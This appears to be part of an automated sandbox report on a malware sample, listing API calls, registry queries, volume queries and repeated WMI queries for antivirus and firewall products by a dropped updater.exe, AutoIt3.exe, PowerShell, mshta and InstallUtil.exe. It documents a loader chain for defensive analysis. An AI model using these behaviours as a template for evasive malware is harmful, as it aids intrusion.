f9875e0dfeebd0ff7229b35b1646f5b57816308ad9d62c6ca75d45bd15c1a2b4da51922caa8e46ac5b09df7821207379a305101f22ea2f6bb40dba589322a506d5ad46da486cf86f662522d165f38590072f1accf13a612369b433b00e300cfd06068817a53c68187347c9ad251d6f1f333877bad8577c4ab84ba78f81483cbcb6bdb1e8fe6a5233fdfff6cc9928404b2e11cfc58e38822138c47f68d6a48778e95f28d8f25c5f1a20d5a198b64b2f05536c7ea824ff816bf184fea692844badf041a46dc4e6a197bda3855b32c46f4b393d58d5d4c7bfbcf82beb6990bb2069da637871dbfb368f1c0e6c0f2a72676ccf3b7fa358c5e09f7e9a8f481775a2d9117cf07d2ed2895d11a6b79e3ce80bd9091e7cc6fcfc76786b1a9a48950c7262c0e9607a4c88c23f16b1cd72267a4445314586554ed8498e02e1556e66e550678d68d2a7dbdbc94565dfee58566dce466d06c87acd0517e92543d88380a92238e86864e5f75c12798c8828272b20a02c40b6b317f309f4d0c660c1d640def366d59f6e605ca9cea69b14214c5d03df39fc5d74b79c43d775d114603d2c9be7f3d35d5f2c62881528c7674e5f58b568c6356fc1470bd70b46364f0545eff33ffc0f3a9487f46e68a23603bcf5a004a1e550eb57c6e96b9828cb4973dbfcb8d62afd7390e01d13cc7760093f91b2f0c22d85e18d540e5cbff1d1a2466bdd39b1846617923d9c4b65a96df2e6fca65713714d212f0f1e8a005b0154fbd7266ba5500e44b40ddfc0174ec740d8ce82ec79b28e9071c42d33693277f784c16744c61bab31bef511d797c50afce5b6f0157f4b0b8f8201dbcafa5813f3156ecfb13519109ff3673aefc6e65c7966d8afa03a8d9d665bf954962cc128461d04e92bbc3e9acd8ca2b7120bf07f55a8ee5e4b6f185e1266c8eddd2ee3761605723cf877a93883b9f459f8231af5ff827049dd16cbcfa02de3abb97da37d487474f6d66efaf3d7d75cf686bd09c2d72bbea469800332fe98aa37baac82515b23041cb7d36849f05ac76ed6cf4e5deeab16e7ffa53e4b56f7ecc66091d6b1dfaf76d3c264e80e69b82674685bf8a742080384ca722b401e88f71676753c5f86d718994e638562e8b5a9b07	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

11_2_004B88CD

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004C4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_004C4F1C

Source: updater.exe, 0000000B.00000003.2229606541.0000000004B4D000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.000000000497A000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000000.2223684167.0000000000516000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: updater.exe, AutoIt3.exe	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerteaq
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q/explorer.exe &&& Program Manager &&& [WIN]rt-]q

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_0048885B cpuid

11_2_0048885B

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_0132FB45
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: GetLocaleInfoA,GetACP,	11_2_01336061
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: GetLocaleInfoA,	11_2_01330469
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: GetLocaleInfoA,	11_2_01334B15
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: GetLocaleInfoA,	11_2_01334AC9
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_0132FC4F
Source: C:\ahdccea\AutoIt3.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	14_2_017543B5
Source: C:\ahdccea\AutoIt3.exe	Code function: GetLocaleInfoA,	14_2_01759339
Source: C:\ahdccea\AutoIt3.exe	Code function: GetLocaleInfoA,	14_2_01759385
Source: C:\ahdccea\AutoIt3.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	14_2_017544BF
Source: C:\ahdccea\AutoIt3.exe	Code function: GetLocaleInfoA,GetACP,	14_2_0175A8D1
Source: C:\ahdccea\AutoIt3.exe	Code function: GetLocaleInfoA,	14_2_01754CD9

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ahdccea\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ahdccea\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004A0030 GetLocalTime,__swprintf,

11_2_004A0030

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004A0722 GetUserNameW,

11_2_004A0722

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_0049416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

11_2_0049416A

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_00475D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00475D13

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
